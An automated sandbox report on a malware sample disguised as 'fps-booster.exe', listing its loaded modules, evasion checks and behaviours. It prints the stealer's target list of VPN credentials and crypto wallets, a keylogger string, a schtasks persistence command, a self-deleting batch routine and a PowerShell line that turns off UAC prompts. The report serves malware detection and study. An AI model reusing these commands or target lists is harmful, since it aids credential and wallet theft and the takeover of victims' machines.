Source: C:\Users\user\Desktop\fps-booster.exe | Sections loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, msasn1.dll, gpapi.dll, windows.storage.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, mswsock.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Sections loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Users\user\Desktop\fps-booster.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: C:\Users\user\Desktop\fps-booster.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: fps-booster.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

        Data Obfuscation

        Source: 0.2.fps-booster.exe.b240000.3.raw.unpack, DynamicUtils.cs .Net Code: CreateSharpArgumentInfoArray
        Source: 0.2.fps-booster.exe.b240000.3.raw.unpack, LateBoundReflectionDelegateFactory.cs .Net Code: CreateDefaultConstructor
        Source: C:\Users\user\Desktop\fps-booster.exe Code function: 0_2_0B2F5E22 pushad ; ret 0_2_0B2F5E36
        Source: C:\Users\user\Desktop\fps-booster.exe Code function: 0_2_0B2FB77E push cs; retf 0_2_0B2FB77F
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_049A6D6E push ecx; ret 2_2_049A6D74
        Source: fps-booster.exe Static PE information: section name: .text entropy: 7.997901129081752
        Source: C:\Users\user\Desktop\fps-booster.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
        Source: C:\Users\user\Desktop\fps-booster.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
        Source: C:\Users\user\Desktop\fps-booster.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        Source: C:\Users\user\Desktop\fps-booster.exe System information queried: FirmwareTableInformation
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PASSWORD: /VPN/CRYPTICVPN/NORDVPNNORDVPN.EXE*USER.CONFIG/VPN/NORDVPN///SETTING[@NAME='USERNAME']/VALUE//SETTING[@NAME='PASSWORD']/VALUE/VPN/NORDVPN//ACCOUNTS.TXTOPENVPN CONNECT/PROFILES/VPN/OPENVPNOVPNPROTONVPNPROTONVPN.EXE/VPN/PROTONVPN\USER.CONFIG/ARMORY//WALLETS/ARMORY//ATOMIC/LOCAL STORAGE/LEVELDB//WALLETS/ATOMIC/LOCAL STORAGE/LEVELDB/SOFTWAREBITCOINBITCOIN-QT/WALLETS/BITCOINCORE/STRDATADIR\WALLET.DAT/WALLETS/BITCOINCORE/WALLET.DAT/BYTECOIN/WALLETS/BYTECOIN/.WALLET\COINOMI\COINOMI\WALLETS/WALLETS/COINOMI//WALLETS/COINOMI/WALLETS/DASHDASH-QT/WALLETS/DASHCORE//WALLETS/DASHCORE/WALLET.DAT/ELECTRUM/WALLETS/WALLETS/ELECTRUM//ETHEREUM/KEYSTORE/WALLETS/ETHEREUM/\EXODUS\EXODUS.WALLET\/WALLETS/EXODUS/\GUARDA\LOCAL STORAGE\LEVELDB/WALLETS/GUARDA//WALLETS/GUARDA/WALLETS/LOCAL STORAGE/LEVELDB\COM.LIBERTY.JAXX\INDEXEDDB\FILE__0.INDEXEDDB.LEVELDB\/WALLETS/JAXX/COM.LIBERTY.JAXX/INDEXEDDB/FILE__0.INDEXEDDB.LEVELDB/LITECOINLITECOIN-QT/WALLETS/LITECOINCORE//WALLETS/LITECOINCORE/WALLET.DATC:\USERS\\APPDATA\LOCAL\MICROSOFT\EDGE\USER DATA\DEFAULT\LOCAL EXTENSION SETTINGS\EJBALBAKOPLCHLGHECDALMEEEAJNIMHM\/WALLETS/METAMASK//WALLETS/METAMASK/EDGE/\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\DEFAULT\LOCAL EXTENSION SETTINGS\NKBIHFBEOGAEAOEHLEFNKODBEFGPGKNN\/WALLETS/METAMASK/CHROME/\APPDATA\LOCAL\BRAVESOFTWARE\BRAVE-BROWSER\USER DATA\DEFAULT\LOCAL EXTENSION SETTINGS\NKBIHFBEOGAEAOEHLEFNKODBEFGPGKNN\/WALLETS/METAMASK/BRAVE/MONERO-PROJECTMONERO-CORE/WALLETS/MONERO/WALLET_PATH//ZCASH//WALLETS/ZCASH/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSIONDIGITALPRODUCTIDFAILED TO GET DIGITALPRODUCTID FROM REGISTRYSFGIEKRUY48W37IEOKGUF\[]SPACERETURN [ENTER]SFGIEKRUY48W37IEOKGUF\KEYLOGGER.TXTWINDOW: TIME: YYYY-MM-DD H:MM:SS TTLOGGED 
DATA:DUCKLOGS:WVJ5TBR0+D9BYD9PP4S3XVCHCROXOUKJDLFK1HOP7GEYGKEWAVE7UANF20KHYVOVIMOBGHDTO6RDC0CASY3VCA==DUCKLOGS:ALOWPSK5RQBOGM5OIVEKOQ==DUCKLOGS:XORKNPUSMVMNNSLNRA0M9RV7N59NS4HQVIL5XMI9PQYFSPFGR0Z1FEXQ+7Y+U10UDUCKLOGS:ZXRFSEYBYEJ1YPJQKALCJG==DUCKLOGS:WVJ5TBR0+D9BYD9PP4S3XVCHCROXOUKJDLFK1HOP7GEYGKEWAVE7UANF20KHYVOVENZ675MVKPSVETZRMCP2RG==DUCKLOGS:JWCXNMNIEY57YP2JRFZQFA==DUCKLOGS:TVFP7NPOSI/LWZJERYN8DUNLKSHHOMJSNDF9HITBUKY=\GOOGLEUPDATE.EXE/CREATE /F /SC ONLOGON /RL HIGHEST /TN "" /TR "/DELETE /F /TN "SCHTASKS.EXEDUCKLOGS:6W3G3QOCADOQC2NITAKT/UIQNXFB8STCVUM7GRSUGHG=DUCKLOGS:DGQUXONSHBLXGHJOHZMR3W==DUCKLOGS:AHGBSCUXIPO0LNFE6LRD+G==STATUSFAILEDACTIONEXECUTEGETCONTENTTOFILEDUCKLOGS:YWROJQF7+XGLHFNUKOPVCW==DESTRUCTDUCKLOGS:ZQW2I2NH/8BEWRY5V7KLUG==/SFGIEKRUY48W37IEOKGUFC:\USERS\PUBLIC.BAT:LTASKLIST /FI "PID EQ " | FIND ":"IF ERRORLEVEL 1 ( TIMEOUT /T 1 /NOBREAK GOTO LRMDIR /S /Q "/C & DEL CMD.EXEMESSAGEMESSAGELINKPOWERSHUTDOWN/S /F /T 0RESTART/R /F /T 0LOGOUTDUCKLOGS:IKRT5VGY2BFDKA3ZJGO3DG==/C SHUTDOWN -LLOCKDUCKLOGS:HHD+3R+EVRAZHE54/W2WNESO8DTUKSJ1YMWK2BRJOL3UO9MAJTJHPY2CK1SQ4IZ8USER32.DLL,LOCKWORKSTATIONHIBERNATEBOMBNOTEPADEXPLORERMSPAINTCMDBSODINPUTDUCKLOGS:3KHDHYCPYZUYANOETO6PTQ9PPIB1EP/0UX3CGV+HJ+K=DUCKLOGS:T6NZTX1JOJD+4QKD1JHVEA==DUCKLOGS
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: 12D0000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: 2D80000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: 2B00000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: 5310000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: 6310000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: 6440000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: 7440000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: 8380000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: 9380000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: A380000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: B380000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: 9110000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: A110000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: B810000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: C810000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: D810000 memory reserve | memory write watch
        Source: C:\Users\user\Desktop\fps-booster.exe Memory allocated: E810000 memory reserve | memory write watch
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\fps-booster.exe Window / User API: threadDelayed 771
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2476
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 741
        Source: C:\Users\user\Desktop\fps-booster.exe TID: 6708 Thread sleep count: 52 > 30
        Source: C:\Users\user\Desktop\fps-booster.exe TID: 6708 Thread sleep time: -52000s >= -30000s
        Source: C:\Users\user\Desktop\fps-booster.exe TID: 6968 Thread sleep count: 771 > 30
        Source: C:\Users\user\Desktop\fps-booster.exe TID: 6968 Thread sleep count: 123 > 30
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5912 Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1816 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Users\user\Desktop\fps-booster.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
        Source: Amcache.hve.6.dr Binary or memory string: VMware
        Source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
        Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
        Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged 
Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown -LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
        Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1hbin@
        Source: Amcache.hve.6.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.6.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.6.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.6.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
        Source: Amcache.hve.6.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.6.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.6.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.6.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.6.dr | Binary or memory string: vmci.sys
        Source: Amcache.hve.6.dr | Binary or memory string: vmci.syshbin`
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
        Source: Amcache.hve.6.dr | Binary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.6.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.6.dr | Binary or memory string: VMware20,1
        Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.6.dr | Binary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.6.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.6.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.6.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.6.dr | Binary or memory string: VMware PCI VMCI Bus Device
        Source: Amcache.hve.6.dr | Binary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.6.dr | Binary or memory string: VMware Virtual RAM
        Source: Amcache.hve.6.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.6.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Users\user\Desktop\fps-booster.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\fps-booster.exe | Process queried: DebugPort
        Source: C:\Users\user\Desktop\fps-booster.exe | Process queried: DebugPort
        Source: C:\Users\user\Desktop\fps-booster.exe | Process queried: DebugPort
        Source: C:\Users\user\Desktop\fps-booster.exe | Process token adjusted: Debug
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
        Source: C:\Users\user\Desktop\fps-booster.exe | Memory allocated: page read and write | page guard
        Source: C:\Users\user\Desktop\fps-booster.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
        Source: C:\Users\user\Desktop\fps-booster.exe | Queries volume information: C:\Users\user\Desktop\fps-booster.exe VolumeInformation
        Source: C:\Users\user\Desktop\fps-booster.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\fps-booster.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
        Source: C:\Users\user\Desktop\fps-booster.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
        Source: C:\Users\user\Desktop\fps-booster.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.6.dr | Binary or memory string: msmpeng.exe
        Source: Amcache.hve.6.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.6.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
        Source: Amcache.hve.6.dr | Binary or memory string: MsMpEng.exe

        Stealing of Sensitive Information

        Source: Yara match | File source: Process Memory Space: fps-booster.exe PID: 1488, type: MEMORYSTR
        Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Password: /VPN/CrypticVPN/NordVPNNordVpn.exe*user.config/VPN/NordVPN///setting[@name='Username']/value//setting[@name='Password']/value/VPN/NordVPN//Accounts.txtOpenVPN Connect/profiles/VPN/OpenVPNovpnProtonVPNProtonVPN.exe/VPN/ProtonVPN\user.config/Armory//Wallets/Armory//atomic/Local Storage/leveldb//Wallets/Atomic/Local Storage/leveldb/SoftwareBitcoinBitcoin-Qt/Wallets/BitcoinCore/strDataDir\wallet.dat/Wallets/BitcoinCore/wallet.dat/bytecoin/Wallets/Bytecoin/.wallet\Coinomi\Coinomi\wallets/Wallets/Coinomi//Wallets/Coinomi/wallets/DashDash-Qt/Wallets/DashCore//Wallets/DashCore/wallet.dat/Electrum/wallets/Wallets/Electrum//Ethereum/keystore/Wallets/Ethereum/\Exodus\exodus.wallet\/Wallets/Exodus/\Guarda\Local Storage\leveldb/Wallets/Guarda//Wallets/Guarda/wallets/Local Storage/leveldb\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\/Wallets/Jaxx/com.liberty.jaxx/IndexedDB/file__0.indexeddb.leveldb/LitecoinLitecoin-Qt/Wallets/LitecoinCore//Wallets/LitecoinCore/wallet.datC:\Users\\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm\/Wallets/Metamask//Wallets/Metamask/Edge/\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Chrome/\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\/Wallets/Metamask/Brave/monero-projectmonero-core/Wallets/Monero/wallet_path//Zcash//Wallets/Zcash/BCDFGHJKMPQRTVWXY2346789N-SOFTWARE\Microsoft\Windows NT\CurrentVersionDigitalProductIdFailed to get DigitalProductId from registrysfgiekruy48w37ieokguf\[]SpaceReturn [ENTER]sfgiekruy48w37ieokguf\KeyLogger.txtWindow: Time: yyyy-MM-dd h:mm:ss ttLogged 
Data:DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVImobghDto6RDc0cAsY3vcA==DUCKLOGS:alOWpSk5rQBogM5oIVEkoQ==DUCKLOGS:XorkNpUsmVMnNslNRA0m9rV7n59ns4hqvIL5Xmi9PQYfsPFgR0z1fExq+7y+u10uDUCKLOGS:ZXRfSEybyeJ1YPjqKALCjg==DUCKLOGS:wvj5tbr0+d9Byd9Pp4S3XvcHcRoXOukJDLfK1hop7GeYgkEWAvE7uANF20KhyvOVEnz675mvKPSVetzRmcp2Rg==DUCKLOGS:jWcxNMniEy57Yp2jRFzqfA==DUCKLOGS:TVfp7NposI/lwzJERYN8duNLkShhOmjsnDf9HitBUkY=\GoogleUpdate.exe/create /f /sc ONLOGON /RL HIGHEST /tn "" /tr "/delete /f /tn "schtasks.exeDUCKLOGS:6w3G3qoCadOqC2NiTAKt/uIQnxFB8sTCvUm7GrSugHg=DUCKLOGS:DGqUxoNsHblxGHjohzMr3w==DUCKLOGS:ahGbScUxipO0Lnfe6lrD+g==statusfailedactionexecuteGetcontentToFileDUCKLOGS:YWROJqF7+XGlHfnukOPVcw==destructDUCKLOGS:ZQW2i2NH/8beWry5v7kLUg==/sfgiekruy48w37ieokgufC:\Users\Public.bat:lTasklist /fi "PID eq " | find ":"if Errorlevel 1 ( Timeout /T 1 /Nobreak Goto lRmdir /S /Q "/C & Del cmd.exemessageMessagelinkpowershutdown/s /f /t 0restart/r /f /t 0logoutDUCKLOGS:iKrt5vgy2bFDKa3zjgO3Dg==/C shutdown -LlockDUCKLOGS:hHD+3R+EVRAZhE54/W2wNESO8DTuKsj1Ymwk2bRjoL3uo9MajTjhpY2cK1sq4iz8user32.dll,LockWorkStationhibernatebombnotepadexplorermspaintcmdbsodinputDUCKLOGS:3kHDHYcpyzUyaNoETo6ptq9PpIb1EP/0ux3CgV+HJ+k=DUCKLOGS:t6NZTX1jojd+4qkd1JHvEA==DUCKLOGS
Source: Yara match; File source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: fps-booster.exe PID: 1488, type: MEMORYSTR

        Remote Access Functionality

Source: Yara match; File source: Process Memory Space: fps-booster.exe PID: 1488, type: MEMORYSTR
MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the count of matched signatures for that technique):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
